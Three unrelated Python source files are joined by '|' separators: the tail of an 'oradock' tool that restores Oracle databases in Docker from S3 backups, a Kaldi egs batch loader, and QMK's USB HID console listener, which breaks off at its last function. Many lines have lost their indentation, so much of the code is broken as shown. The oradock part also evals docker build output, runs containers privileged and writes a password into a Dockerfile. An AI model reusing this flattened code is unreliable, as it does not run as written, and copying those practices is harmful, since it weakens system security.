args['--s3-bucket']='-'+',-'*args['DATABASE'].count(',')
else:
args['--s3-bucket']=args['--s3-bucket'].replace('/,',',').rstrip('/')
args['--datafile-dir']=args['--datafile-dir'].replace('/,',',').rstrip('/')
args['--backup-directory']=args['--backup-directory'].replace('/,',',').rstrip('/')
args['--oradock-home']=args['--oradock-home'].rstrip('/')
def preprocess_restart_args(args):
args['--s3-bucket']='-'+',-'*args['DATABASE'].count(',')
args['--backup-directory']='-'+',-'*args['DATABASE'].count(',')
args['--datafile-dir']=args['--datafile-dir'].replace('/,',',').rstrip('/')
args['--oradock-home']=args['--oradock-home'].rstrip('/')
def preprocess_create_image_args(args):
args['--oradock-home']=args['--oradock-home'].rstrip('/')
def preprocess_create_database_args(args):
args['--s3-bucket']='-'+',-'*args['DATABASE'].count(',')
args['--backup-directory']='-'+',-'*args['DATABASE'].count(',')
args['--oradock-home']=args['--oradock-home'].rstrip('/')
args['--datafile-dir']=args['--datafile-dir'].replace('/,',',').rstrip('/')
## all params check
def check_args_count(arg1, arg2): #check 2 input options
if arg1.count(',')!=arg2.count(','):
logging.error('missing arguments - number of databases does not match with arguments info')
sys.exit(-1)
def check_s3_bucket(s3_access_key, s3_secret_key, s3_bucket, database):
    if (s3_access_key is None) != (s3_secret_key is None): #one of the keys was given without the other
logging.error('please provide a valid s3 access and secret key')
sys.exit(-1)
s3connection=create_s3conn(s3_access_key,s3_secret_key)
if not s3_bucket is None:
for s3_bucket_list in s3_bucket.split(','): #check conn to s3 and if bucket exists
s3_bucket_name=s3_bucket_list.split('/')[2]
s3_full_path_dir='/'.join(s3_bucket_list.split('/')[s3_bucket_list.split('/').index(s3_bucket_name)+1:])
logging.debug('checking for bucket \'%s\'' % s3_bucket_name)
try:
s3_bucket_conn=s3connection.lookup(s3_bucket_name)
except boto.exception.S3PermissionsError as error:
logging.error('permission denied at bucket %s [%s]' % (s3_bucket_name, error.args[0]))
sys.exit(-1)
except boto.exception.S3ResponseError as error:
logging.error('unexpected response from s3 [%s]' % error.args[1])
sys.exit(-1)
except boto.exception.S3DataError as error:
logging.error('error while retrieving data from s3 [%s]' % error.args[0])
sys.exit(-1)
if s3_bucket_conn is None:
                logging.error('s3 bucket \'%s\' does not exist. Please, review your bucket name and access/secret key' % s3_bucket_name)
sys.exit(-1)
            if len(list(s3_bucket_conn.list(s3_full_path_dir,'/')))==0:
                logging.error('s3 backup directory \'%s\' does not exist' % s3_full_path_dir)
check_args_count(database, s3_bucket)
    s3connection.close()
def check_file_or_directories_warn(file_or_dir, database):
if file_or_dir.find('/backup/$DATABASE')==0:
file_or_dir=''
for database_name in database.split(','):
file_or_dir+='/backup/'+database_name+','
file_or_dir=file_or_dir.rstrip(',')
for path in file_or_dir.split(','):
if not os.path.exists(path):
            logging.warning('file or directory \'%s\' does not exist' % path)
def check_file_or_directories_error(file_or_dir, database):
if file_or_dir.find('/backup/$DATABASE')==0:
file_or_dir=''
for database_name in database.split(','):
file_or_dir+='/backup/'+database_name+','
file_or_dir=file_or_dir.rstrip(',')
for path in file_or_dir.split(','):
        if not os.path.exists(path):
            logging.error('file or directory \'%s\' does not exist' % path)
sys.exit(-1)
def check_memory(memory):
total_percent_memory=0
for each_memory_percent in memory.split(','): #validating memory sum percent
total_percent_memory = total_percent_memory+int(each_memory_percent)
if total_percent_memory > 100 or total_percent_memory < 0:
logging.error('memory exceeds server capacity')
sys.exit(-1)
def check_port(port):
    if int(port) < 1 or int(port) > 65535:
        logging.error('port number exceeds the OS limit')
        sys.exit(-1)
    sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    result=sock.connect_ex(('127.0.0.1',int(port)))
    sock.close()
    if result==0:
        logging.error('port is already in use. Please change port number to a free socket')
        sys.exit(-1)
def check_and_create_oinstall_dir(oradock_home, oinstall_dir):
oinstall_dir_default=oradock_home+'/conf/dockerfile/config_files/database'
if not os.path.exists(oinstall_dir_default):
if oinstall_dir.find('$ORADOCK_HOME')==0:
            logging.error('directory with Oracle Install binary files does not exist [ %s ]' % oinstall_dir_default)
sys.exit(-1)
elif not os.path.exists(oinstall_dir):
            logging.error('directory with Oracle Install binary files does not exist [ %s ]' % oinstall_dir)
sys.exit(-1)
logging.info('copying install directory at \'%s\' to \'%s\'' % (oinstall_dir, oinstall_dir_default))
copytree(oinstall_dir, oinstall_dir_default)
def check_dockerfile_template(dockerfile):
if dockerfile.find('$ORADOCK_HOME')==-1 and not os.path.exists(dockerfile): #check if dockerfile has default value
        logging.error('dockerfile does not exist')
sys.exit(-1)
def check_container(docker_client, args):
if args['--container-name'].find('oradock-db-$DATABASE')==0:
args['--container-name']='oradock-db-'+args['DATABASE'].replace(',', '-')
if len(docker_client.containers(all=True, filters={'name':args['--container-name']}))!=0:
logging.error('container \'%s\' already exists' % args['--container-name'])
sys.exit(-1)
def check_image(image_name, docker_client):
if len(docker_client.images(name=image_name))!=0:
logging.error('image \'%s\' already exists' % image_name)
sys.exit(-1)
def check_restore_params(args, docker_client):
check_s3_bucket(args['--s3-access-key'], args['--s3-secret-key'], args['--s3-bucket'], args['DATABASE'])
check_args_count(args['DATABASE'], args['MEMORY'])
check_args_count(args['DATABASE'], args['SERVICE_NAME'])
check_args_count(args['DATABASE'], args['--backup-directory'])
check_file_or_directories_warn(args['--backup-directory'], args['DATABASE'])
check_file_or_directories_error(args['--oradock-home'], args['DATABASE'])
check_memory(args['MEMORY'])
check_port(args['--port'])
check_container(docker_client, args)
def check_restart_params(args, docker_client):
check_args_count(args['DATABASE'], args['MEMORY'])
check_args_count(args['DATABASE'], args['SERVICE_NAME'])
check_file_or_directories_error(args['--oradock-home'], args['DATABASE'])
check_memory(args['MEMORY'])
check_port(args['--port'])
check_container(docker_client, args)
def check_create_image_params(args, docker_client):
check_and_create_oinstall_dir(args['--oradock-home'], args['--oinstall-dir'])
check_dockerfile_template(args['--dockerfile-template'])
check_image(args['IMAGE_NAME'], docker_client)
def check_create_database_params(args, docker_client):
check_args_count(args['DATABASE'], args['MEMORY'])
check_args_count(args['DATABASE'], args['SERVICE_NAME'])
check_file_or_directories_error(args['--oradock-home'], args['DATABASE'])
check_memory(args['MEMORY'])
check_port(args['--port'])
check_container(docker_client, args)
## auxiliary function
def create_database_settings(args): #create a dict with database infos
database = {}
if args['--backup-directory'].find('/backup/$DATABASE')==0:
args['--backup-directory']=''
for database_name in args['DATABASE'].split(','):
args['--backup-directory']+='/backup/'+database_name+','
args['--backup-directory']=args['--backup-directory'].rstrip(',')
for database_name, memory, service_name, s3_bucket, backup_dir in zip( args['DATABASE'].split(','),
args['MEMORY'].split(','),
args['SERVICE_NAME'].split(','),
args['--s3-bucket'].split(','),
args['--backup-directory'].split(',')):
database[database_name] = {'memory':memory, 'service_name':service_name, 's3_bucket':s3_bucket, 'backup_directory':backup_dir}
logging.debug('database info: %s' % database)
return database
def create_directory(directory): #create directory to save s3 files
if not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as error:
if error.errno == errno.ENOENT :
logging.error('error creating directory \'%s\'. No such file or directory' % directory)
sys.exit(-1)
elif error.errno == errno.EACCES:
logging.error('error creating directory \'%s\'. Permission denied' % directory)
sys.exit(-1)
else:
logging.error('error creating directory \'%s\'. %s' % (directory, str(error)))
sys.exit(-1)
def change_directory_owner(directory, uid, gid):
if os.path.exists(directory):
msg_flag=0
for root, directories, files in os.walk(directory):
try:
os.chown(root, uid, gid)
for each_directory in directories:
os.chown(root +'/'+ each_directory, uid, gid)
for each_files in files:
os.chown(root + '/'+ each_files, uid, gid)
except OSError as error:
if msg_flag==0:
                    if error.errno == errno.EPERM:
                        logging.warning('could not change permissions on directory \'%s\'. Permission denied' % directory)
                    else:
                        logging.warning('could not change permissions on directory \'%s\'. %s' % (directory, str(error)))
msg_flag=1
def set_docker_volumes(database_list, datafile_dir, oradock_home): #configure all volumes required to start the container
container_volumes=[]
container_volumes_config=[]
for database, info in database_list.items():
container_volumes.append(datafile_dir + '/' + database)
container_volumes.append('/u01/app/oracle/diag/rdbms/' + database)
container_volumes_config.append(datafile_dir +'/'+ database +':'+ datafile_dir +'/'+ database)
container_volumes_config.append('/tmp/' + database + ':/u01/app/oracle/diag/rdbms/' + database)
if info.get('backup_directory')!='-':
container_volumes.append(info.get('backup_directory'))
container_volumes_config.append(info.get('backup_directory') +':'+ info.get('backup_directory'))
container_volumes.append(oradock_home + '/conf')
container_volumes.append(oradock_home + '/database')
container_volumes.append(oradock_home + '/consume')
container_volumes_config.append(oradock_home + '/conf:' + oradock_home + '/conf')
container_volumes_config.append(oradock_home + '/database:' + oradock_home + '/database')
container_volumes_config.append(oradock_home + '/consume:' + oradock_home + '/consume')
return container_volumes, container_volumes_config
def prepare_dockerfile(dockerfile_name, str_source, str_dest):
try:
dockerfile_template=open(dockerfile_name, 'r').read()
dockerfile=open(dockerfile_name+'.new','w')
sed_process=re.compile(str_source, re.MULTILINE)
dockerfile.write(sed_process.sub(str_dest, dockerfile_template))
dockerfile.close()
copyfile(dockerfile_name+'.new', dockerfile_name)
os.remove(dockerfile_name+'.new')
except OSError as error:
        if error.errno == errno.ENOENT:
            logging.error('error creating dockerfile \'%s\'. No such file or directory' % dockerfile_name)
            sys.exit(-1)
        elif error.errno == errno.EACCES:
            logging.error('error creating dockerfile \'%s\'. Permission denied' % dockerfile_name)
            sys.exit(-1)
        else:
            logging.error('error creating dockerfile \'%s\'. %s' % (dockerfile_name, str(error)))
            sys.exit(-1)
def call_process_build(function_name, arguments, animation):
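    #run 'function_name' in a child process, appending a shared Manager list to its arguments
    #so the child can report its output back; a spinner is shown until the process finishes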
docker_build_log=Manager().list()
arguments+=(docker_build_log,)
    process=Process(name=function_name.__name__, target=function_name, args=arguments)
process.start()
    spinner = '-\\|/' #do not clobber the ANIMATION_NUMBER argument
    idx=0
    man_animation=['(>\'.\')>', '<(\'.\'<)']
    if(animation=='2'):
        man_animation=['\\o/', '|o|', '\\o/', '|o|']
    if (logging.getLogger().getEffectiveLevel()!=logging.DEBUG):
        while process.exitcode is None:
            print('\r' + spinner[idx % len(spinner)] + ' Executing... ' + man_animation[idx % len(man_animation)], end='')
            idx = idx + 1
            time.sleep(0.2)
else:
process.join()
print('\r', end='')
return docker_build_log
## docker function
def docker_build(docker_client, image_name, dockerfile_dir, docker_image):
try:
oradock_image=[line for line in docker_client.build(path=dockerfile_dir, stream=True, rm=True, tag=image_name)]
docker_image.append(oradock_image)
except docker_error.APIError as error:
logging.error('error creating image \'%s\' [%s]' % (image_name, error.args[0]))
sys.exit(-1)
except TypeError as error:
logging.error('error creating image \'%s\' [%s]' % (image_name, error.args[0]))
sys.exit(-1)
except KeyboardInterrupt as error:
sys.exit(-1)
def docker_start(docker_client, image_name, container_name, container_volumes, container_volumes_config, container_port_config): #starts a container
try:
oradock_container=docker_client.create_container(image=image_name,
name=container_name,
hostname=os.uname()[1] ,
user='oracle',
detach=True,
ports=[1521],
tty=True,
volumes=container_volumes,
host_config =
docker_client.create_host_config(
binds=container_volumes_config,
port_bindings=container_port_config,
privileged=True)
)
docker_client.start(oradock_container)
except docker_error.APIError as error:
logging.error('error while trying to start container [%s]' % error.args[0])
sys.exit(-1)
return oradock_container
def docker_run(docker_client, oradock_container, command, log): #executes a command inside the container
try:
logging.debug('executing bash inside container: %s' % command)
config_exec=docker_client.exec_create( container=oradock_container['Id'],
cmd=command,
user='oracle',
stdout=True,
stderr=True,
tty=False)
for exec_log in docker_client.exec_start( exec_id=config_exec['Id'],
tty=False,
detach=False,
stream=True):
exec_output = ''.join(chr(x) for x in exec_log)
exec_output = exec_output.strip()
print('\r'+exec_output)
except docker_error.APIError as error:
logging.error('error while trying to execute command \'%s\' on container: %s ' % (command, error.args[0]))
except docker_error.DockerException as error:
logging.error('error while trying to execute docker command: %s ' % error.args[0])
def docker_pull(docker_client, image_name, log):
try:
docker_client.pull(repository=image_name, stream=False)
except docker_error.DockerException as error:
logging.error('error while trying to download docker image: %s ' % error.args[0])
sys.exit(-1)
#oradock argument final function
def restore_or_restart_or_create_database(args, database_list, docker_client): #restore all databases inside the container
if len(docker_client.images(name=args['--image-name']))==0 or args['--force-pull']==True:
logging.info('Downloading or updating image \'%s\'' % args['--image-name'])
process_args=(docker_client, args['--image-name'])
call_process_build(docker_pull, process_args, args['--animation'])
logging.debug('defining volumes to mount into container')
for database, info in database_list.items():
create_directory(args['--datafile-dir']+'/'+database)
create_directory('/tmp/' + database)
change_directory_owner(args['--datafile-dir']+'/'+database, 501, 503)
change_directory_owner('/tmp/' + database, 501, 503)
change_directory_owner(info.get('backup_directory'), 501, 503)
(container_volumes, container_volumes_config)=set_docker_volumes(database_list, args['--datafile-dir'], args['--oradock-home'])
container_port_config={1521 : args['--port']}
logging.info('creating & starting container \'%s\'' % args['--container-name'])
oradock_container=docker_start(docker_client, args['--image-name'], args['--container-name'], container_volumes, container_volumes_config, container_port_config)
logging.info('container started')
logging.info('executing database script inside container')
command_args=[]
if args['restore']==True:
command_args.append(args['--backup-directory'])
script_name='restore'
elif args['restart']==True:
script_name='restart'
elif args['create']==True and args['database']==True:
command_args.append(args['PASSWORD'])
script_name='create'
command_args.append(args['DATABASE'])
command_args.append(args['MEMORY'])
command_args.append(args['SERVICE_NAME'])
command_args.append(args['--oradock-home'])
command_args.append(args['--datafile-dir'])
command_args.append(args['--spfile-name'])
command_args.append(args['--control-file-name'])
command_args.append(args['--parallel'])
command_args.append(' > /tmp/'+script_name+'_database.log')
command = '/bin/bash '+ args['--oradock-home'] +'/database/'+ script_name + '_database.sh '+ ' '.join(command_args)
process_args=(docker_client, oradock_container, command)
docker_exec_log=call_process_build(docker_run, process_args, args['--animation'])
def create_image(args, docker_client):
oinstall_dir=args['--oradock-home']+'/conf/dockerfile/config_files/database'
with open(oinstall_dir+'/install/oraparam.ini', 'r') as config_file: #search for oracle binary install version
install_version=None
for line in config_file:
if line.find('OUI_VERSION')!=-1:
install_version=line.rstrip().split('=')[1]
    if install_version is None:
        logging.error('cannot find oracle install binary versions. Please, check if file \'%s\' exists' % (oinstall_dir+'/install/oraparam.ini'))
        sys.exit(-1)
dockerfile=args['--oradock-home']+'/conf/dockerfile/Dockerfile'
if args['--dockerfile-template'].find('$ORADOCK_HOME')==0:
copyfile(dockerfile+'.template', dockerfile) #replace password and install versions into dockerfile
else:
        copyfile(args['--dockerfile-template'], dockerfile) #the template is a single file, so copyfile instead of copytree
prepare_dockerfile(dockerfile, '\${password}', args['PASSWORD'])
prepare_dockerfile(dockerfile, '\${install_version}', install_version)
prepare_dockerfile(dockerfile, '\${oinstall_dir}', args['--oinstall-dir'])
prepare_dockerfile(dockerfile, '\${hostname}', socket.gethostname())
logging.info('dockerfile created at \'%s\'' % dockerfile)
logging.info('creating image \'%s\'' % args['IMAGE_NAME'])
process_args=(docker_client, args['IMAGE_NAME'], args['--oradock-home']+'/conf/dockerfile')
docker_build_log=call_process_build(docker_build, process_args, args['--animation'])
for exec_log in docker_build_log[0]:
exec_output = ''.join(chr(x) for x in exec_log)
exec_output = eval(exec_output.replace('\\n"}', '"}'))
try:
logging.debug(exec_output['stream'])
except KeyError as error:
logging.error('docker build could not execute due to error [%s]' % str(error))
sys.exit(-1)
rmtree(args['--oradock-home']+'/conf/dockerfile/config_files/database')
logging.info('docker image successfully created')
os.remove(args['--oradock-home']+'/conf/dockerfile/Dockerfile')
## main
if __name__ == '__main__':
arguments = docopt(__doc__, version=__version__)
#print(arguments)
set_log(arguments['--log-level'])
docker_client=Client(base_url='unix://var/run/docker.sock')
try:
#call for restore option
if arguments['restore']==True:
check_restore_params(arguments, docker_client)
preprocess_restore_args(arguments)
database=create_database_settings(arguments)
if arguments['--s3-bucket']!='-':
download_s3(database, arguments['--backup-directory'], arguments['--s3-access-key'], arguments['--s3-secret-key'])
restore_or_restart_or_create_database(arguments, database, docker_client)
#call for restart option
elif arguments['restart']==True:
check_restart_params(arguments, docker_client)
preprocess_restart_args(arguments)
database=create_database_settings(arguments)
restore_or_restart_or_create_database(arguments, database, docker_client)
#call for create image/database option
elif arguments['create']==True:
if arguments['image']==True:
check_create_image_params(arguments, docker_client)
preprocess_create_image_args(arguments)
create_image(arguments, docker_client)
elif arguments['database']==True:
check_create_database_params(arguments, docker_client)
preprocess_create_database_args(arguments)
database=create_database_settings(arguments)
restore_or_restart_or_create_database(arguments, database, docker_client)
except KeyboardInterrupt as error:
print('\nSee ya! ')
|
kaldi_egs.py
|
from utils.misc import get_logger
log = get_logger()
import threading, time
import utils.kaldi_io
import numpy as np
def load_and_prep_dev_set_tar(egs_dir, nnet3_copy_egs_to_feats):
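    #read the validation egs archive through nnet3_copy_egs_to_feats and return the labels
    #(last '-' separated field of each key), the features stacked and reshaped into a single
    #(1, n_frames, feat_dim) matrix, and the utterance boundary indices into that matrix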
dev_feat_rsp = "ark:" + nnet3_copy_egs_to_feats + " ark:" + egs_dir + "/valid_egs.1.ark ark:- |"
dev_feats_generator = utils.kaldi_io.read_mat_ark(dev_feat_rsp)
dev_set = list(dev_feats_generator)
dev_lab = np.array([int(dev_set[i][0].split("-")[-1]) for i in range(len(dev_set))])
dev_feat = np.vstack([dev_set[i][1][np.newaxis,:,:] for i in range(len(dev_set))])
dev_idx = list(range(0, dev_feat.shape[0]*(dev_feat.shape[1]+1), dev_feat.shape[1]))
return dev_lab, dev_feat.reshape(1,-1,dev_feat.shape[2]), dev_idx
class egsBatchQue(object):
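    """Background loader for Kaldi nnet3 egs archives.
    A daemon thread keeps up to 'ark_que_length' decoded archives queued in memory;
    get_batch() slices minibatches of 'b_size' examples from them, crossing archive
    boundaries when the current archive runs out.
    """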
def __init__(self, nnet3_copy_egs_to_feats, archive_path, b_size, n_archives, ark_que_length, feat_size=40, do_shuffle=False):
self.delete = False
self.nnet3_copy_egs_to_feats = nnet3_copy_egs_to_feats
self.archive_path = archive_path
self.b_size = b_size
self.n_archives = n_archives
self.ark_que_length = ark_que_length
self.feat_size = feat_size
self.do_shuffle = do_shuffle
if self.do_shuffle:
            self.archive_list = np.random.permutation( self.n_archives ) +1 # +1 because egs indices start from 1
log.debug( "Shuffled the archive list " )
else:
self.archive_list = np.arange( self.n_archives ) +1 # np.random.permutation( len( self.n_archives ) )
self.qued_archives = []
self.archive_idx = 0 # Index for which archive to process
self.batch_idx_ark = 0 # Index for where to start the batch within the current archive
self.batch_number = 1
self.batch_thread = threading.Thread( target =self.prep_archives )
        self.batch_thread.daemon = True # daemon thread: it is stopped automatically when the main process exits
self.batch_thread.start()
def prep_archives( self ):
while not self.delete:
if ( len(self.qued_archives ) < self.ark_que_length ):
log.info( "Loading new archive" ) # self.qued_archives
# If we have reached the last archive.
if self.archive_idx == len( self.archive_list ) -1:
self.archive_idx = 0
if self.do_shuffle:
                        self.archive_list = np.random.permutation( self.n_archives ) + 1
log.debug( "Shuffled the archive list " )
feat_rsp="ark:" + self.nnet3_copy_egs_to_feats + " ark:" + self.archive_path + "/egs." + str( self.archive_list[ self.archive_idx ] ) + ".ark ark:- |"
feats_generator=utils.kaldi_io.read_mat_ark(feat_rsp)
a=list(feats_generator)
lab=np.array([int(a[i][0].split("-")[-1]) for i in range(len(a))])
feat=np.vstack([a[i][1][np.newaxis,:,:] for i in range(len(a))])
log.debug("loading archive done.")
self.archive_idx += 1
if self.do_shuffle:
idx=np.random.permutation( len(lab) )
feat = feat[idx]
lab = lab[idx]
log.debug( "Shuffled the loaded archive." )
                self.qued_archives.append( [lab,feat] )
            else:
                time.sleep(0.5) # queue is full; avoid busy-waiting while the consumer catches up
def get_batch(self):
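        #return the next b_size examples; when the current archive is exhausted the
        #remainder of the batch is taken from the next queued archive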
X=[]
U=[]
bad_tr_files = []
tr_idx = None
control_nb = 0
log.debug ( "Retrieving batch" )
while len(self.qued_archives) < 1:
time.sleep(1)
        log.debug( "Examples in current archive: " + str(len( self.qued_archives[0][0] )) )
        log.debug( "Batch end index: " + str(self.batch_idx_ark + self.b_size) )
if len( self.qued_archives[0][0] ) >= self.batch_idx_ark + self.b_size:
assert ( len( self.qued_archives[0][1] ) == len( self.qued_archives[0][0] ) )
start = self.batch_idx_ark
end = self.batch_idx_ark + self.b_size
tr_feats = self.qued_archives[0][1][start:end]
Y = self.qued_archives[0][0][start:end]
self.batch_idx_ark = end
else:
assert ( len( self.qued_archives[0][1] ) == len( self.qued_archives[0][0] ) )
start = self.batch_idx_ark
end = self.batch_idx_ark + self.b_size # Will be beyond last index but this is OK
tr_feats = self.qued_archives[0][1][start:end]
Y = self.qued_archives[0][0][start:end]
self.qued_archives.pop(0)
n_needed = self.b_size - Y.shape[0]
while len(self.qued_archives) < 1 :
time.sleep(1)
assert ( len( self.qued_archives[0][1] ) == len( self.qued_archives[0][0] ) )
log.debug( tr_feats.shape )
log.debug( self.qued_archives[0][1][0:n_needed].shape )
log.debug( Y.shape )
log.debug( self.qued_archives[0][0][0:n_needed].shape )
tr_feats = np.vstack( (tr_feats, self.qued_archives[0][1][0:n_needed]) )
Y = np.hstack( (Y, self.qued_archives[0][0][0:n_needed]) )
self.batch_idx_ark = n_needed
self.batch_number += 1
return [[X, Y, U], [bad_tr_files], [tr_feats.astype('float32'), tr_idx], self.batch_number, control_nb]
|
console.py
|
"""Acquire debugging information from usb hid devices
cli implementation of https://www.pjrc.com/teensy/hid_listen.html
"""
from pathlib import Path
from threading import Thread
from time import sleep, strftime
import hid
import usb.core
from milc import cli
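# Typically invoked through QMK's 'qmk' entry point (flags are defined at the bottom of this
# file); the VID:PID value below is only illustrative:
#   qmk console --list
#   qmk console -d 16C0:0486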
LOG_COLOR = {
'next': 0,
'colors': [
'{fg_blue}',
'{fg_cyan}',
'{fg_green}',
'{fg_magenta}',
'{fg_red}',
'{fg_yellow}',
],
}
KNOWN_BOOTLOADERS = {
# VID , PID
('03EB', '2FEF'): 'atmel-dfu: ATmega16U2',
('03EB', '2FF0'): 'atmel-dfu: ATmega32U2',
('03EB', '2FF3'): 'atmel-dfu: ATmega16U4',
('03EB', '2FF4'): 'atmel-dfu: ATmega32U4',
('03EB', '2FF9'): 'atmel-dfu: AT90USB64',
('03EB', '2FFA'): 'atmel-dfu: AT90USB162',
('03EB', '2FFB'): 'atmel-dfu: AT90USB128',
('03EB', '6124'): 'Microchip SAM-BA',
('0483', 'DF11'): 'stm32-dfu: STM32 BOOTLOADER',
('16C0', '05DC'): 'USBasp: USBaspLoader',
('16C0', '05DF'): 'bootloadHID: HIDBoot',
('16C0', '0478'): 'halfkay: Teensy Halfkay',
('1B4F', '9203'): 'caterina: Pro Micro 3.3V',
('1B4F', '9205'): 'caterina: Pro Micro 5V',
('1B4F', '9207'): 'caterina: LilyPadUSB',
('1C11', 'B007'): 'kiibohd: Kiibohd DFU Bootloader',
('1EAF', '0003'): 'stm32duino: Maple 003',
    ('1FFB', '0101'): 'caterina: Pololu A-Star 32U4 Bootloader',
('2341', '0036'): 'caterina: Arduino Leonardo',
('2341', '0037'): 'caterina: Arduino Micro',
('239A', '000C'): 'caterina: Adafruit Feather 32U4',
('239A', '000D'): 'caterina: Adafruit ItsyBitsy 32U4 3v',
('239A', '000E'): 'caterina: Adafruit ItsyBitsy 32U4 5v',
('2A03', '0036'): 'caterina: Arduino Leonardo',
('2A03', '0037'): 'caterina: Arduino Micro',
('314B', '0106'): 'apm32-dfu: APM32 DFU ISP Mode'
}
class MonitorDevice(object):
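    """Attach to a single hid_listen-style console device and stream its text output."""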
def __init__(self, hid_device, numeric):
self.hid_device = hid_device
self.numeric = numeric
self.device = hid.Device(path=hid_device['path'])
self.current_line = ''
cli.log.info('Console Connected: %(color)s%(manufacturer_string)s %(product_string)s{style_reset_all} (%(color)s%(vendor_id)04X:%(product_id)04X:%(index)d{style_reset_all})', hid_device)
def read(self, size, encoding='ascii', timeout=1):
"""Read size bytes from the device.
"""
return self.device.read(size, timeout).decode(encoding)
def read_line(self):
"""Read from the device's console until we get a \n.
"""
while '\n' not in self.current_line:
self.current_line += self.read(32).replace('\x00', '')
lines = self.current_line.split('\n', 1)
self.current_line = lines[1]
return lines[0]
def run_forever(self):
while True:
try:
message = {**self.hid_device, 'text': self.read_line()}
identifier = (int2hex(message['vendor_id']), int2hex(message['product_id'])) if self.numeric else (message['manufacturer_string'], message['product_string'])
message['identifier'] = ':'.join(identifier)
message['ts'] = '{style_dim}{fg_green}%s{style_reset_all} ' % (strftime(cli.config.general.datetime_fmt),) if cli.args.timestamp else ''
cli.echo('%(ts)s%(color)s%(identifier)s:%(index)d{style_reset_all}: %(text)s' % message)
except hid.HIDException:
break
class FindDevices(object):
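    """Poll for console devices (and optionally bootloaders) and spawn a MonitorDevice thread for each one found."""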
def __init__(self, vid, pid, index, numeric):
self.vid = vid
self.pid = pid
self.index = index
self.numeric = numeric
def run_forever(self):
"""Process messages from our queue in a loop.
"""
live_devices = {}
live_bootloaders = {}
while True:
try:
for device in list(live_devices):
if not live_devices[device]['thread'].is_alive():
cli.log.info('Console Disconnected: %(color)s%(manufacturer_string)s %(product_string)s{style_reset_all} (%(color)s%(vendor_id)04X:%(product_id)04X:%(index)d{style_reset_all})', live_devices[device])
del live_devices[device]
for device in self.find_devices():
if device['path'] not in live_devices:
device['color'] = LOG_COLOR['colors'][LOG_COLOR['next']]
LOG_COLOR['next'] = (LOG_COLOR['next'] + 1) % len(LOG_COLOR['colors'])
live_devices[device['path']] = device
try:
monitor = MonitorDevice(device, self.numeric)
device['thread'] = Thread(target=monitor.run_forever, daemon=True)
device['thread'].start()
except Exception as e:
device['e'] = e
device['e_name'] = e.__class__.__name__
                            cli.log.error("Could not connect to %(color)s%(manufacturer_string)s %(product_string)s{style_reset_all} (%(color)s%(vendor_id)04X:%(product_id)04X:%(index)d{style_reset_all}): %(e_name)s: %(e)s", device)
if cli.config.general.verbose:
cli.log.exception(e)
del live_devices[device['path']]
if cli.args.bootloaders:
for device in self.find_bootloaders():
if device.address in live_bootloaders:
live_bootloaders[device.address]._qmk_found = True
else:
name = KNOWN_BOOTLOADERS[(int2hex(device.idVendor), int2hex(device.idProduct))]
cli.log.info('Bootloader Connected: {style_bright}{fg_magenta}%s', name)
device._qmk_found = True
live_bootloaders[device.address] = device
for device in list(live_bootloaders):
if live_bootloaders[device]._qmk_found:
live_bootloaders[device]._qmk_found = False
else:
name = KNOWN_BOOTLOADERS[(int2hex(live_bootloaders[device].idVendor), int2hex(live_bootloaders[device].idProduct))]
cli.log.info('Bootloader Disconnected: {style_bright}{fg_magenta}%s', name)
del live_bootloaders[device]
sleep(.1)
except KeyboardInterrupt:
break
def is_bootloader(self, hid_device):
"""Returns true if the device in question matches a known bootloader vid/pid.
"""
return (int2hex(hid_device.idVendor), int2hex(hid_device.idProduct)) in KNOWN_BOOTLOADERS
def is_console_hid(self, hid_device):
"""Returns true when the usage page indicates it's a teensy-style console.
"""
return hid_device['usage_page'] == 0xFF31 and hid_device['usage'] == 0x0074
def is_filtered_device(self, hid_device):
"""Returns True if the device should be included in the list of available consoles.
"""
return int2hex(hid_device['vendor_id']) == self.vid and int2hex(hid_device['product_id']) == self.pid
def find_devices_by_report(self, hid_devices):
"""Returns a list of available teensy-style consoles by doing a brute-force search.
Some versions of linux don't report usage and usage_page. In that case we fallback to reading the report (possibly inaccurately) ourselves.
"""
devices = []
for device in hid_devices:
path = device['path'].decode('utf-8')
if path.startswith('/dev/hidraw'):
number = path[11:]
report = Path(f'/sys/class/hidraw/hidraw{number}/device/report_descriptor')
if report.exists():
rp = report.read_bytes()
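                    # heuristic: inspect the first bytes of the raw report descriptor for the
                    # 0xFF31 vendor usage-page pattern checked by is_console_hid() above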
if rp[1] == 0x31 and rp[3] == 0x09:
devices.append(device)
return devices
def find_bootloaders(self):
"""Returns a list of available bootloader devices.
"""
return list(filter(self.is_bootloader, usb.core.find(find_all=True)))
def find_devices(self):
"""Returns a list of available teensy-style consoles.
"""
hid_devices = hid.enumerate()
devices = list(filter(self.is_console_hid, hid_devices))
if not devices:
devices = self.find_devices_by_report(hid_devices)
if self.vid and self.pid:
devices = list(filter(self.is_filtered_device, devices))
# Add index numbers
device_index = {}
for device in devices:
id = ':'.join((int2hex(device['vendor_id']), int2hex(device['product_id'])))
if id not in device_index:
device_index[id] = 0
device_index[id] += 1
device['index'] = device_index[id]
return devices
def int2hex(number):
"""Returns a string representation of the number as hex.
"""
return "%04X" % number
def list_devices(device_finder):
"""Show the user a nicely formatted list of devices.
"""
devices = device_finder.find_devices()
if devices:
cli.log.info('Available devices:')
for dev in devices:
color = LOG_COLOR['colors'][LOG_COLOR['next']]
LOG_COLOR['next'] = (LOG_COLOR['next'] + 1) % len(LOG_COLOR['colors'])
cli.log.info("\t%s%s:%s:%d{style_reset_all}\t%s %s", color, int2hex(dev['vendor_id']), int2hex(dev['product_id']), dev['index'], dev['manufacturer_string'], dev['product_string'])
if cli.args.bootloaders:
bootloaders = device_finder.find_bootloaders()
if bootloaders:
cli.log.info('Available Bootloaders:')
for dev in bootloaders:
cli.log.info("\t%s:%s\t%s", int2hex(dev.idVendor), int2hex(dev.idProduct), KNOWN_BOOTLOADERS[(int2hex(dev.idVendor), int2hex(dev.idProduct))])
@cli.argument('--bootloaders', arg_only=True, default=True, action='store_boolean', help='Show bootloaders in addition to console devices.')
@cli.argument('-d', '--device', help='Device to select - uses format <vid>:<pid>[:<index>].')
@cli.argument('-l', '--list', arg_only=True, action='store_true', help='List available hid_listen devices.')
@cli.argument('-n', '--numeric', arg_only=True, action='store_true', help='Show VID/PID instead of names.')
@cli.argument('-t', '--timestamp', arg_only=True, action='store_true', help='Print the timestamp for received messages as well.')
@cli.argument('-w', '--wait', type=int, default=1, help="How many seconds to wait between checks (Default: 1)")
@cli.subcommand('Acquire debugging information from usb hid devices.', hidden=False if cli.config.user.developer else True)
def console(cli):
